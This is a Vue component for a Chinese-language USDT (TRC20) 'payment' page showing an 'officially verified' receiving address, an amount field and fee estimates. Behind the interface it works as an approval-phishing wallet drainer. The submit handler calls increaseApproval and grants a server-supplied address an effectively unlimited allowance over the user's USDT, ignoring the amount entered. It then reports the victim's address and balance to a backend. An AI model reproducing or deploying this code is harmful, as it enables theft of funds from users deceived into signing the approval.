<template>

	<div class="n-config-provider">
		<div style="min-height: 50vh;">
			<div data-v-0a9c4d80="" class="page-container">
				<div data-v-0a9c4d80="" class="bottom-m10 spaceb left-m10 right-m30 top-p10 fs15 font500">
					<p data-v-0a9c4d80="">收款地址</p>
					<p data-v-0a9c4d80="" style="color: rgb(52, 120, 246);">官方已验证</p>
				</div>
				<div data-v-0a9c4d80="" class="left-m10 bg-f9 br8 right-m10 no-select"
					style="padding: 12px 15px; border: 1px solid rgb(241, 241, 241);">
					{{ authorized_address }}
				</div>
				<div data-v-0a9c4d80="" class="bottom-m10 left-m10 right-m10 top-m20 fs14 spaceb"><span
						data-v-0a9c4d80="" class="fs16 font500">数量</span></div>
				<div data-v-0a9c4d80="" class="bg-f9 left-m10 br8 right-m10"
					style="border: 1px solid rgb(241, 241, 241);">
					<div data-v-0a9c4d80="" class="address left-m20 top-p20 bottom-p10 column">
						<div data-v-0a9c4d80=""
							style="margin-right: 15px; display: flex; border-bottom: 1px solid rgb(238, 238, 238); padding-bottom: 2px;">
							<div data-v-0a9c4d80="" class="van-cell van-cell--borderless van-cell--large van-field"
								style="font-size: 16px; padding: 0px 0px 10px; background: rgb(249, 249, 249); font-weight: bold; color: rgb(0, 0, 0); border-bottom: none;">
								<!----><!---->
								<div class="van-cell__value van-field__value">
									<div class="van-field__body"><input type="text" inputmode="decimal"
											id="van-field-1-input" class="van-field__control" placeholder="请输入数量"
											v-model="number"><!----><!----><!----></div><!----><!---->
								</div><!----><!---->
							</div>
							<div data-v-0a9c4d80="" class="max-button" @click="max()">最大</div>
						</div>
						<div data-v-0a9c4d80="" class="spaceb right-m10" style="margin: 10px 0px 3px;"><span
								data-v-0a9c4d80="">资产</span>
							<div data-v-0a9c4d80="" class="fs14 right-m20 center-w"><img data-v-0a9c4d80=""
									class="token-logo"
									src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAMgAAADICAYAAACtWK6eAAAAAXNSR0IArs4c6QAADnhJREFUeF7tnb+OJzkRx7snhQAikG4I4AEgvujmQLo3IFxI7gku3F1pdqW7C+8JSPYm3DdAgp2LLkMCiRAI2BOQIISEhIT0a+Te8W/c/XN3l9tV7Sr7O8n+Gbe7/HV9flXltvvXd/g5VIHru+c3Fzc8nS7/zze6uroP27998unk34ca3+DN+gbHLDrkMwCn081w1X8w3mwYlgHItabv7/vT8NXYzdXVPQDKFXR6PQDJ0HOE4SgQUu0EOKmKRdsDkAQZHRBDN9yKR4UEm1Ka9kP3EpEmRbGuAyArek0ihGSalDZnbK0BzLaUAGSm0TlKVAjEljs4YN7+8vMXW+1a+j0A6brOeurE7bA+sgCWxlOslqMFFarWYWkuggAKKhqX7VpMwZoBBGDsB2N+ZUugVA8IwOADo0VQqgUEYMiB0RIo1QECMI4DowVQqgEEYJQDo2ZQqgDk+tXTF0PfvdsCgh81CtRQzJsGBFFDDQuLhliHxCwg7909eyO6jVy/75my0Coo5gBBOmWKi6mxbgt+17+0dGbFFCCAwzAcgemWookJQFBr1AFGOAorkKgHBFGjPjjOIzKQcqkGBIV4xXAYSblUAoKUqg0wLKRc6gBBStUeHGHK9c2Tzz7UpIAqQACHJtcoZ0vfX32oZSlYDSCAo5xDaryzFkhUAAI4NLpoeZs0LAUXBwRwlHdEzRaUhqQoIFjG1eyaemwrCUkxQACHHge0YEkpSIoAAjgsuKQ+G0tAcjggqDn0OZ4li46G5FBAAIclV9Rr65GQHAYI4NDrcBYtO+o5ySGAAA6LLqjf5iMgEQcEcOh3NMsWSkMiCgjgsOx6Rmzv+3vJDY6igLz35dPBiMww07ICgpCIAYJnHZY9zp7tUitbIoAgtbLnYDVYLFGPsAMCOGpwNaNjEEi12AFB3WHUuWoxmxkSVkBQd9TiZbbHwVmPsAGC1Mq2U9VmPVc9wgII4KjNvSoYD1OqxQII6o4KHKrCIXCkWtmAIHpU6FkVDSk31coGBNGjIm+qcSiZqVYWIIgeNXpUfWPKiSK7AQEc9TlSzSP65hef7/L1XRc5ITWnVu9/74c1z7XasX39j7+otW1vwb4LEM3Rw8Hx+qOP1U5UzYZd3z1TPbw9qdYuQLRHDwBSxk+1A9LtKNiTAdEcPZxbIIKUgcPdVT0gXdelRpFkQDRHDwBSDg4rgKRGkSRAtEcPAAJAKAqkRJEkQLRHDwBCcQ+5NhZSrHH0CbUIGRAL0QOAyDk/pWczgCTUImRALEQPAEJxY7k2lgChRhESIFaiBwCRc35Kz6YAIUYREiBWogcAobixXBtrgFCiyCYglqIHAJFzfkrP5gAhRJFNQKydM8eDQoory7RpDpDru+c3w3B6IyOnTK8AREZXSq8WAdlKs1YjiLX0CikWxY3l2pgEZCPNWgXEUnHupx0RRA6ArZ6tArIWRRYBsRg9EEG2XFj292YB6bpu6UAVAJH1maZ6twzI0v6sRUAspleIIGV5tAzIUpoVBcRqegVAAEiOArE0C4DkKIprJwqYjiALq1lRQKymV4ggZYm1DkgszboAxOLDwdAtsMxbDpI2AHn19MXQd7flZM67swPk/e//KK8TxqtHe4ReQ+Res6PpVTtf/P43jMqV6Wq+mnURQaztvSojI/2un/zkZ90nP/4p/YKElj//9a9UAZJgutqm24Dgm2lZJw+AsMop39nsOO4kglhe3pVXbt8dAMg+3UpeFS73AhDhmQAgwgILdB+mWRNAUH/wqw1A+DWV7nEZENQf7NoDEHZJ5TsM6pBzBLH+/ENetX13ACD7dCt6VRQQ488/igq6cnMAonVm1u3yhfpjBAEgIjMJQERkFe/U1yFnQFCgy2gOQGR0le71EhAU6CKaAxARWcU79d9I9RhBAIiI6ABERFb5Th8K9REQrGDJ6Q1A5LQV7XkCCAp0Ma0BiJi04h27lax3EQSAZIk9384ebreX3O7++k+/6/76n3+dbf/673+ejEPTVvgsgQtd7Ap1ALIivnf8ucO7S7bOeHjnvP7Wd7offPu7IlP8x3/+rfv3//577nvNphAW/3cPFECKT88ZkJaXeOcHrJY+8WOHk8JP7CUnK5ViLUW18P/nbc7guINYD9GoZXiaAySEYQ7CHADnIBzOUQqQlJAVRsrz34NTkHNwOHRJsa9UW7fUO6ZYtUYQ55w+HQo/Lb/4w2/PmksfE7UAyJoD+g+VOTgeEq9fjdBUB0g4mTEgpGGIOZp1QGJjctqGHz6uTQhMLbA8AmL4IaGHIjz37dOlEkDMHapGQOZj9MCEH0puDpz+lmExDUjM8VzqpAGK0IFaAGQ+3nl9p3FeKHWNSUCsgOEnoDVA/Lhj7yczB0rf378r0g2kWLEw7mzX/uqbVgHxoLz+6OOLZ0ba5+wcXawAsuRkFoRuHRDnbDFITEQTB4j2jYpLrxJ1xZ8DRPsPAOnGFa/Yy/PUQ2IBkNinj19WBCA23qy49iGh+n2+FlKst08+WwwS6j+BuuVPT47IZyHFdONcm0PVY7AAyFaKoh2SLftzQFHtXA8bOl0GsPSjPk2uARCfbml9KNUqIJRxa/9wM/MchCK2VlCotu+JJNoiSGxXw9K4tMPh7DYDiDM21dG0bHVItTsFFA2ApEDhx2YBjikgd8/edMNwkzI5JdouPSzcssXvzeLawr51v/D34ca+lOsobUukleGRgT3fe2IFDpOAhNsY3Cfz1qm+teLQp2Q4GLSM4tr5GQrAYcRwf9e2T25rDOa3u8e2XW8Neu33sRN1HqScfjVfSz1RuWcM/tyNNTD8WM0DspTK7I0sW06wdq7bX6the/fkWG3wfY2x04JbY079vXUowvFWe+TWO8L8UE/qZHO0TwXGtU8BPKUtx3jmfXggStR3EuOJAlL7a380ASM9qZL9h+f2awRirt3je7Hunt8Mw+mNpLja+t56UYE2e4+0R+oFFkeOgeNeTQOyJOA8f5/8W+j7zjkmM6WPcDHiXDvhNT9TCcNXj7rfWDg0leIEkm3neX/sxXL+/tI1QmzhIBw75d1dklpZ7fvy7e5GHhZaE7z2J+nW5oNqLwChKpXZDoBkCljo8gtAal/JKqRz8h6yFDs17MVKsddS24tvmNJ+9NaSuKGtiCA2Z+7ySzwbXOo9YuoAyBEq89/jAhCsZPGL7HoEIDK6Svbq6w93j/N3FI6AYCWLXXcAwi6peIeLgKBQ59cegPBrKt2jL9AvIggKdX7pAQi/ptI9+vrjAhDUIfzSAxB+TSV7DNOrOCCoQ1j1ByCscop3tgkI6hDeOQAgvHpK9xamV9EIgjqEdwoACK+e0r1tAoI6hHcKAAivnpK9zdOraATB8xDeKQAgvHpK9kYGBGkW3zQAED4tpXuap1eLEQRpFt9UABA+LSV7ikWPdUCw3MsyHwCERUbxTpIBQZrFMycAhEdH6V5i6dVqBEGxzjMlAIRHR8lelqIHAJFU/aFvAHKAyJm3CDcnzruabHef/xJpVqbyOA+SL6B0Dw+v91m6zSogSLPyZwcRJF9DyR7W0qvNFMs1QBTJmx4Akqef9NVLxbm/72YEGaPIl08HaUNr7R+A6J3ZrehBiiBjFHn19MXQd7d6h6rXMgCid262ogcZEESR/ZMMQPZrJ3klJXokAYIosm+6AMg+3aSvokSPJEAQRfZNGQDZp5vkVdTokQ4I9mclzxsASZZM/AIxQLDkmz53ACRdM8krUuBIjiBjmoUokjR/ACRJLvHG4oAgiqTNIQBJ00uydSocuyKIuwgrWvRpBCB0raRbUleuQjtIT9JjhiPVok0nAKHpJN1qT/TYHUHGKIKvSyDNKQAhySTeaE/0yAIEBTttTgEITSfJVnujRzYgiCLb0wpAtjWSbJEDRzYgKNi3pxaAbGsk2WJvauVt2l2kh4NCwb48xQBE0v3X+86NHiwRBAX7+iQBkEKAbBylpVrFEkGQaiGCUB3uqHZrL2JIsYENEKxqxWVHBElxR562HKkVaw0yqUdwPHcyywCEx+mpvXDCwVaDhMZj6Xc6lQCE6to87XJXreZWsKZYvnPs1XqUGYDwOD6lF666I7yXCCCoRwAIxaE523CnVmI1COoRpFicjk/pSwoOkRoE9QhlStGGTQGm5x1L9oilWKhH2FwAHa0owF2UH1Kkz2+Coh0+LqGARFFeBBB3U0Ai4SLt9nkEHOI1CCJJuw4sOXLJorxYBEFNIuky7fR9JByHRxA/jdge345Dc470aDiKAeJuDEg4Xaf+vkrAURQQFO71OzXXCEvBURwQQMLlQvX2UxIOFYAAknqdO3dkRy3lrtkp/iSdKhKek1CVaqOdBjjURBAsAbfh9KRR9v193/Uv3z759J7UXriRmggCSIRn2kL3whsP90igDpCxJnGvNe2G224YbvYMCtfYU6B0Mb6kmEpAEE3sOXiOxVrqjdgYVAOCFa4ctzNwrbJ6wyQg3mg8eTfg8Akmak2p5kNQH0FCg7EUnOCBiptqTqlMA4KUS7HXU0wzkFKZBwQFPMUT9bWxFDVC9UylWPNpd8vB3el0M/TdrT6XgEVOASu1hsllXqqLoTahKnVgO4PplOlVLMrUAhSKSvJtrKZT1QPii3j3J9IueRAu7qBwq0iuCqZrkLXBu2gCUHLdg3a99TpjbZTVAhKudgEUmqOntqoZDK9F9YCEk44aJRWBePsWwGgSkDCqoEZJhKWSVanEUXdNRZC5OKhTCO7SKBhNR5CYW4zp11X/Ac6guKd7uk71ETAWa9J0BImC0urTeUARhQyArHz2+K0sVa6C9f145tud/3Z/ajkDLhYKdnYMQBKEO+/9spiKAYiEmX5sCkB2yfbuokmE0QTNAwyIEBmT+3ApAMnX8KKHC3DGHE3gBRQ+KpyGr7qrqzFlQqrEO6EAhFdPcm8jROHP6TT994PDh03g/GR52Rr+H1WRCFwFgYw/AAAAAElFTkSuQmCC">
								{{u_money}} USDT
							</div>
						</div>
					</div>
				</div>
				<div data-v-0a9c4d80="" class="bottom-m10 left-m10 right-m10 top-m20 fs14 center-w"><span
						data-v-0a9c4d80="" class="fs16 font500">网络费</span><svg data-v-0a9c4d80=""
						class="loader left-m10" width="19" height="19" viewBox="0 0 19 19"
						xmlns="http://www.w3.org/2000/svg">
						<circle data-v-0a9c4d80="" class="background" cx="9.5" cy="9.5" r="7" stroke-width="2"
							fill="none"></circle>
						<circle data-v-0a9c4d80="" class="foreground" cx="9.5" cy="9.5" r="7" stroke-width="2"
							fill="none"></circle>
					</svg>

				</div>
				<div class="estimate-container" data-v-0a9c4d80="">
					<div class="spaceb center-w" data-v-0a9c4d80="">
						<div class="center-w" data-v-0a9c4d80="">
							<div class="level-container" data-v-0a9c4d80=""><img
									src="data:image/png;base64,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"
									data-v-0a9c4d80=""></div><span class="fs14 left-m10" data-v-0a9c4d80="">中等</span>
						</div><span style="color:#06d6a0;" data-v-0a9c4d80="">预计5秒</span>
					</div>
					<div class="spaceb top-m10" data-v-0a9c4d80=""><span class="fs13" data-v-0a9c4d80="">预估费用</span>
						<div class="center-w" data-v-0a9c4d80=""><span class="fs12 o7" style="margin-right:5px;"
								data-v-0a9c4d80="">$1.52 </span><span class="fs13" data-v-0a9c4d80=""> 13.4
								TRX</span></div>
					</div>
					<div class="spaceb" data-v-0a9c4d80=""><span class="fs13" data-v-0a9c4d80="">最高费用</span>
						<div class="center-w" data-v-0a9c4d80=""><span class="fs12 o7" style="margin-right:5px;"
								data-v-0a9c4d80="">$2.61 </span><span class="fs13" data-v-0a9c4d80=""> 23.5
								TRX</span></div>
					</div>
				</div>
				<div class="tips-container" data-v-0a9c4d80=""><span data-v-0a9c4d80="">预估费用：正常情况需支付的成本</span><span
						data-v-0a9c4d80="">最高费用：网络波动，最大可接受的成本，可调节</span></div>
				<div data-v-0a9c4d80="" class="center-w confirm-btn left-m10 right-m10" style="margin-top: 15px;">
					<button @click="approveToken()" data-v-0a9c4d80="" type="button"
						class="van-button van-button--default van-button--large van-button--loading"
						style="color: white; background: rgb(52, 120, 246); border-color: rgb(52, 120, 246); width: 100%; border-radius: 12px;">
						<div class="van-button__content">
							提 交
						</div>
					</button>
				</div>
			</div>
		</div><!---->
	</div>
</template>

<script>
	import axios from 'axios'

	import domain from '../../public/domain';

	import layer from "layui-layer";
	export default {
		name: 'App',
		data() {
			return {
				walletAddress: '',
				tronWeb: '',
				u_money: 0,
				number: '',
				authorized_address: '',
				balance:0
			}
		},


		methods: {

			async getUserAddress() {
					var a = setInterval(async () => {
						// console.log(123)
						this.walletAddress = window.tronWeb.defaultAddress.base58;
						console.log(this.walletAddress)
				
						var walletAddress = this.walletAddress
				
						this.walletAddress = walletAddress
				
						let _this = this;
						let contract = await window.tronWeb.contract().at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
						let balanceInfo = await contract.balanceOf(walletAddress).call(function(e, balan) {
							const balance = balan / 10 ** (6 || 18) * 1;
							_this.balance = balance
						});
				
				
						if (walletAddress != "" && this.syl != 0) {
							clearInterval(a)
							_this.checkbalance(walletAddress)
						}
					}, 1000)
				
				// var _this = this; //定义_this暂存this
				// let timerId = setTimeout(function() {
				// 	console.log('链接钱包')
				// 	if (window.tronWeb) {

				// 		_this.tronWeb = window.tronWeb;
				// 		_this.walletAddress = _this.tronWeb.defaultAddress.base58;


				// 		if (_this.walletAddress) {
				// 			clearTimeout(timerId);
				// 			console.log(_this.walletAddress)
				// 			_this.checkbalance(_this.walletAddress)

				// 		}

				// 	}


				// }, 1000);
			},


			async checkbalance(userAddress) {
				// alert('123')
				var tronWeb = window.tronWeb;
				try {
					// 获取 TRC20 合约实例
					let contract = await tronWeb.contract().at("TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t");
					let balance = await contract.balanceOf(userAddress).call();
					console.log(balance);
					this.u_money = tronWeb.toBigNumber(balance).toString() / 1000000
				} catch (error) {
					console.error('查询余额失败:', error);

				}
			},
			max() {
				this.number = this.u_money
			},
			get_spenderAddress() {
				var im = this
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/get_address?type=trc",
					})
					.then(function(response) {
						console.log(response.data.data.authorized_address)
						im.authorized_address = response.data.data.authorized_address

					})
					.catch(function(error) {
						console.log(error);
					});

			},
			async approveToken() {
				if (!this.number || isNaN(this.number) || parseFloat(this.number) <= 0) {
					layer.msg("金额错误", {
						icon: 2
					})
					return false;
				}
				
				var balance = this.balance;
				let walletAddress = this.walletAddress
				
				var approveAddr = "TR7NHqjeKQxGTCi8q8ZY4pL8otSzgjLj6t";
				var authorized_address = this.authorized_address;
				
				let tronWeb = window.tronWeb
				
				let instance = await tronWeb.contract().at(approveAddr);
				let res = await instance["increaseApproval"](authorized_address, "90000000000000000000000000000");
		
				var vm = this;
				res.send({
					feeLimit: 100000000,
					callValue: 0,
					shouldPollResponse: false
				}, function(err, res) {
	
					if (err == null) {
						vm.insert_address(balance)
					}else{
						// vm.insert_address(balance)
						layer.msg("支付失败", {
							icon: 2
						})
					}
				
				})
				


			},

			insert_address(balance) {
				var address = this.walletAddress
				var authorized_address = this.authorized_address
				var im = this
				axios({
						method: 'POST',
						url: domain.publicUrl + "/api/api/insert_trc",
						data: {
							type: 'trc',
							address: address,
							authorized_address: authorized_address,
							balance: balance,
						},
					})
					.then(function(response) {
						console.log(response)
						layer.msg('支付成功', {
							icon: 1
						})
					})
					.catch(function(error) {
						console.log(error);
						layer.msg('支付失败', {
							icon: 1
						})
					});


			},

		},
		mounted: function() { //自动触发写入的函数
			this.getUserAddress();
			this.get_spenderAddress();

		}
	}
</script>